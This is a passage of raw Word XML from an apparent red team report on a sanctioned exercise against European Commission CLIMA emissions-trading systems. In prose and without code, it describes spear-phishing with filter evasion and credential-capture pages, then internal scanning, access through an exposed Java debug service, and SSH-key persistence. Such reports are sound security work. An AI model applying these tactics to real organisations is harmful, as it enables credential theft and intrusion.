              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E76B76" w:rsidRPr="001019D3" w14:paraId="5FDC0C10" w14:textId="77777777" w:rsidTr="00B312DF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1058" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="318AE4A2" w14:textId="77777777" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Phishing Campaign</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="667" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="3871EFBF" w14:textId="316C1B83" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00B312DF" w:rsidP="004A6BBF">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10/08/2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3275" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="06074483" w14:textId="6A2717A8" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76" w:rsidP="00B312DF">
            <w:pPr>
              <w:spacing w:before="60" w:line="264" w:lineRule="auto"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Amazon security team identified part of </w:t>
            </w:r>
            <w:r w:rsidR="00F92F72" w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CLIMA phishing campaigns and contacted directly our team and CSIRC to identify the purpose of the “malicious” activity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7B929252" w14:textId="31C5CEDC" w:rsidR="00B312DF" w:rsidRPr="001019D3" w:rsidRDefault="00B312DF" w:rsidP="00B312DF">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="133" w:name="_Toc213253598"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Table \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: List of deconflictions.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="133"/>
    </w:p>
    <w:p w14:paraId="730CBDEB" w14:textId="1CC97970" w:rsidR="00E76B76" w:rsidRPr="001019D3" w:rsidRDefault="00E76B76">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:smallCaps/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEE098A" w14:textId="1721F221" w:rsidR="00710724" w:rsidRPr="001019D3" w:rsidRDefault="00E46B10" w:rsidP="00E46B10">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:ind w:left="403" w:hanging="403"/>
      </w:pPr>
      <w:bookmarkStart w:id="134" w:name="_Toc212654654"/>
      <w:bookmarkStart w:id="135" w:name="_Toc213253560"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Technical </w:t>
      </w:r>
      <w:bookmarkEnd w:id="45"/>
      <w:r w:rsidR="00B312DF" w:rsidRPr="001019D3">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="00DF43CA" w:rsidRPr="001019D3">
        <w:t>eport</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
      <w:bookmarkEnd w:id="134"/>
      <w:bookmarkEnd w:id="135"/>
    </w:p>
    <w:p w14:paraId="332E1559" w14:textId="2B465EA2" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00901AD4">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="136" w:name="_Toc212654655"/>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>The findings are ordered by the attack path described below, not by their risk rating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F5B500" w14:textId="77777777" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00901AD4">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Findings could be individually exploited or be used as a step in the attack path which could allow an attacker to move laterally, escalate their privileges, or establish persistent access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322D8749" w14:textId="77777777" w:rsidR="00901AD4" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00901AD4">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The findings may not reflect all vulnerable target systems or instances. Compared to penetration tests and vulnerability assessments, Red Team exercises focus only on vulnerabilities that allow to achieve the defined objectives and goals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D18B6F" w14:textId="72700A24" w:rsidR="00601FE3" w:rsidRPr="001019D3" w:rsidRDefault="00601FE3" w:rsidP="00601FE3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="137" w:name="_Toc213253561"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Attack path</w:t>
      </w:r>
      <w:bookmarkEnd w:id="136"/>
      <w:bookmarkEnd w:id="137"/>
    </w:p>
    <w:p w14:paraId="58B7D665" w14:textId="46E779A8" w:rsidR="00601FE3" w:rsidRPr="001019D3" w:rsidRDefault="00601FE3" w:rsidP="00B312DF">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The following figure shows visually the attack path that the Red Team used to achieve the goals and objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA8B669" w14:textId="5FF553AE" w:rsidR="00601FE3" w:rsidRPr="001019D3" w:rsidRDefault="00636F4F" w:rsidP="00F533A7">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="16"/>
          <w:lang w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ACACB24" wp14:editId="6472F4FD">
            <wp:extent cx="5384800" cy="2676191"/>
            <wp:effectExtent l="19050" t="19050" r="6350" b="0"/>
            <wp:docPr id="148150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07608" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5410552" cy="2688989"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="266AAC31" w14:textId="2C111F50" w:rsidR="00601FE3" w:rsidRPr="001019D3" w:rsidRDefault="00601FE3" w:rsidP="00F533A7">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="_Toc213253788"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Attack path</w:t>
      </w:r>
      <w:r w:rsidR="00F533A7" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="138"/>
    </w:p>
    <w:p w14:paraId="58643723" w14:textId="26D2781E" w:rsidR="00D6264F" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00F1387E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc212654656"/>
      <w:bookmarkStart w:id="140" w:name="_Toc213253562"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>External or outsider perspective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
      <w:bookmarkEnd w:id="140"/>
    </w:p>
    <w:p w14:paraId="386CAACF" w14:textId="6E08F31C" w:rsidR="00D6264F" w:rsidRPr="001019D3" w:rsidRDefault="00334E6A" w:rsidP="004356D9">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The scenario from an outsider perspective was to send 2 separate targeted phishing emails to CLIMA staff and external service providers developing code on the AWS cloud (SRV4DEV), both target audience work on ETS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BCE8C8" w14:textId="4B5817F8" w:rsidR="007C1D50" w:rsidRPr="001019D3" w:rsidRDefault="007C1D50" w:rsidP="00334E6A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Reconnaissance &amp; Targeting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073B16AD" w14:textId="0695F21B" w:rsidR="007C1D50" w:rsidRPr="001019D3" w:rsidRDefault="007C1D50" w:rsidP="004356D9">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Target lists were provided by the initiator to minimize the risk of attacking out of scope users. Message tone, sender display names, and timing were tailored to each </w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>audience</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to increase credibility and reduce suspicion. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E1B269" w14:textId="1D726301" w:rsidR="007C1D50" w:rsidRPr="001019D3" w:rsidRDefault="007C1D50" w:rsidP="00334E6A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: Email </w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>generation &amp; d</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>elivery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D86052A" w14:textId="00104620" w:rsidR="007C1D50" w:rsidRPr="001019D3" w:rsidRDefault="00334E6A" w:rsidP="004356D9">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Emails were c</w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">rafted and dispatched using polymorphic templates and unique tracking for each recipient. Each message contained </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">link that redirected through short-lived redirectors to staged landing pages </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t>credential</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">capture. </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>Em</w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t>ail headers, reply-to addresses, and link text mimicked legitimate vendors and internal services</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> of the European Commission</w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Time </w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t>windows</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> for sending</w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">emitting </w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">IPs, and DKIM/SPF alignment were adjusted to test mail gateway </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> and evade basic filtering heuristics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4980FDBE" w14:textId="02B0112F" w:rsidR="007C1D50" w:rsidRPr="001019D3" w:rsidRDefault="007C1D50" w:rsidP="00334E6A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>Capture u</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">ser </w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>nteraction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74932D2C" w14:textId="37F05D0F" w:rsidR="007C1D50" w:rsidRPr="001019D3" w:rsidRDefault="007C1D50" w:rsidP="004356D9">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">A large proportion of recipients engaged with the content: many clicked the embedded link. </w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>The c</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">lick </w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>behaviour</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> was analy</w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>ed to separate accidental clicks from deliberate interaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60008CDC" w14:textId="7F7ED8DF" w:rsidR="00161CD3" w:rsidRPr="001019D3" w:rsidRDefault="00161CD3" w:rsidP="00161CD3">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1890"/>
        </w:tabs>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="57" w:right="57"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Goal achieved</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: “</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>AWS – SRV4DEV AWS GitLab code repo/CI system (PROD)</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEBC23D" w14:textId="1CC9A0BC" w:rsidR="00334E6A" w:rsidRPr="001019D3" w:rsidRDefault="00334E6A" w:rsidP="004356D9">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213097179 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004356D9" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> for more information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D38F84E" w14:textId="779E596A" w:rsidR="007C1D50" w:rsidRPr="001019D3" w:rsidRDefault="007C1D50" w:rsidP="00334E6A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>4:</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> Post-</w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">lick </w:t>
      </w:r>
      <w:r w:rsidR="00334E6A" w:rsidRPr="001019D3">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>onitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9AA3FA" w14:textId="073E1B72" w:rsidR="007C1D50" w:rsidRPr="001019D3" w:rsidRDefault="00334E6A" w:rsidP="004356D9">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">ll redirects and landing pages </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> log</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>ged with</w:t>
      </w:r>
      <w:r w:rsidR="007C1D50" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> detailed telemetry (click timestamps, full referrer chains, IP addresses, geolocation, user-agent strings, and interaction events). This timeline allowed correlation of click events to mail delivery logs and SIEM/EDR alerts to evaluate detection coverage and response timing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E1F862" w14:textId="33972DD4" w:rsidR="00EB4F09" w:rsidRPr="001019D3" w:rsidRDefault="007C1D50" w:rsidP="004356D9">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The campaign produced a </w:t>
      </w:r>
      <w:r w:rsidR="004356D9" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">notable </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>click-through rate, demonstrating human risk and gaps in technical controls and user awareness that warrant mitigation</w:t>
      </w:r>
      <w:r w:rsidR="004356D9" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4264F6F6" w14:textId="34C9F5DF" w:rsidR="00D6264F" w:rsidRPr="001019D3" w:rsidRDefault="00901AD4" w:rsidP="00F1387E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="141" w:name="_Toc213253563"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Internal or insider perspective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="141"/>
    </w:p>
    <w:p w14:paraId="00158152" w14:textId="611CBF5B" w:rsidR="004356D9" w:rsidRPr="001019D3" w:rsidRDefault="004356D9" w:rsidP="004356D9">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The scenario from an insider perspective was to use internal resources to scan for systems that are part of ETS then try to find vulnerabilities or weaknesses to gain access, maintain access, move laterally until all goals and objectives have been achieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71706A98" w14:textId="239F83B2" w:rsidR="00304A1E" w:rsidRPr="001019D3" w:rsidRDefault="004356D9" w:rsidP="002329AB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Step 1: Enumerate all ETS systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076E6F18" w14:textId="6095B237" w:rsidR="00304A1E" w:rsidRPr="001019D3" w:rsidRDefault="004356D9" w:rsidP="00161CD3">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Through slow scans it was possible to scan all internal systems and using a CMDB determine if they belong to ETS and thus consider them for the next steps. With the target list confirmed the Red Team continued scanning for vulnerabilities and exposed services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CF3AF2" w14:textId="5D8DD6FC" w:rsidR="004356D9" w:rsidRPr="001019D3" w:rsidRDefault="004356D9" w:rsidP="00161CD3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Step 2: Initial access using JDWP remote code execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A283DD4" w14:textId="55CA507D" w:rsidR="00F1387E" w:rsidRPr="001019D3" w:rsidRDefault="00F1387E" w:rsidP="00161CD3">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">After the initial enumeration of the </w:t>
      </w:r>
      <w:r w:rsidR="00304A1E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">CLIMA </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>environment several servers with a vulnerable Java Debug Bridge service were identifie</w:t>
      </w:r>
      <w:r w:rsidR="00D15F75" w:rsidRPr="001019D3">
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>. This provided the Team the initial foothold on some of the environment’s servers</w:t>
      </w:r>
      <w:r w:rsidR="00304A1E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="001855DA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">To keep the </w:t>
      </w:r>
      <w:r w:rsidR="00161CD3" w:rsidRPr="001019D3">
        <w:t>persistent</w:t>
      </w:r>
      <w:r w:rsidR="001855DA" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> access and not have to exploit the vulnerability, the Red Team build persistence with the compromised service account by adding a key that can be used to connect normally to the remote system via SSH.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="080DA5C9" w14:textId="3E763860" w:rsidR="00A27475" w:rsidRPr="001019D3" w:rsidRDefault="00161CD3" w:rsidP="00161CD3">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1582"/>
        </w:tabs>
        <w:spacing w:before="60" w:after="60"/>
        <w:ind w:left="57" w:right="57"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Objective</w:t>
      </w:r>
      <w:r w:rsidR="00FB3693" w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> achieved</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AF5B79C" w14:textId="6EC72BB5" w:rsidR="00161CD3" w:rsidRPr="001019D3" w:rsidRDefault="00161CD3" w:rsidP="00A27475">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
      </w:pPr>
